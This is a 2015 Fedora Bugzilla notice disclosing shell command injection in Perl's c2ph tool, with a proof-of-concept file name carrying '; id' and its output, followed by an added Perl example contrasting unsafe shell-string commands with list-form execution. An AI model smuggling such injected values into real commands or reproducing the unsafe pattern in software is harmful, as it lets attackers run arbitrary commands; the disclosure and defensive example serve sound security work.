[Bug 1210614] New: Shell command injection in c2ph tool
bugzilla at redhat.com
Fri Apr 10 08:13:36 UTC 2015
https://bugzilla.redhat.com/show_bug.cgi?id=1210614
Bug ID: 1210614
Summary: Shell command injection in c2ph tool
Product: Fedora
Version: 21
Component: perl
Assignee: jplesnik at redhat.com
Reporter: ppisar at redhat.com
QA Contact: extras-qa at fedoraproject.org
CC: cweyl at alumni.drew.edu, iarnell at gmail.com,
jplesnik at redhat.com, kasal at ucw.cz,
perl-devel at lists.fedoraproject.org, ppisar at redhat.com,
psabata at redhat.com, rc040203 at freenet.de,
tcallawa at redhat.com
The c2ph tool suffers from shell command injection:
$ c2ph -n '; id; x.c'
cc: fatal error: no input files
compilation terminated.
uid=500(petr) gid=500(petr) groups=500(petr),63(audio),100(users),478(mock) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh: x.c: command not found
Tested with perl-5.18.4-308.fc21.x86_64.
Reported to upstream <https://rt.perl.org/Ticket/Display.html?id=124275>.
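Added example, not part of the original report and not c2ph's actual source: a Perl sketch of the bug class shown above, contrasting a compiler command built as one shell string with a list-form piped open. The stand-in "compiler" (a child perl that echoes its arguments) and the helper names shell_string and run_list are assumptions made so the example runs without cc.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed stand-in for cc so the example runs anywhere: a child perl
# that prints each argument it receives, one per line, in brackets.
my @compiler = ($^X, '-e', 'print "arg: [$_]\n" for @ARGV', '--');

# The file name used in the report.
my $file = '; id; x.c';

# Unsafe pattern: one interpolated string. system, backticks or a pipe
# open given a single string with shell metacharacters goes through
# "sh -c", so the shell, not the compiler, decides where the name ends.
sub shell_string {
    my ($cc, $name) = @_;
    return "$cc $name";
}

# Safer pattern: list-form piped open. Perl execs the program directly
# and each list element arrives as exactly one argv entry.
sub run_list {
    my @argv = @_;
    # A leading '-' would still be read as an option by the program.
    die "refusing option-like file name\n" if $argv[-1] =~ /^-/;
    open(my $out, '-|', @argv) or die "cannot run $argv[0]: $!\n";
    my @lines = <$out>;
    close($out) or warn "child exited with status $?\n";
    return @lines;
}

# Printed only, never executed.
print "string a shell would parse: ", shell_string('cc', $file), "\n";
# Executed without a shell: the whole name is a single argument.
print run_list(@compiler, $file);
```

With the list form the child reports the whole name as one bracketed argument, so nothing after the first semicolon is run as a separate command.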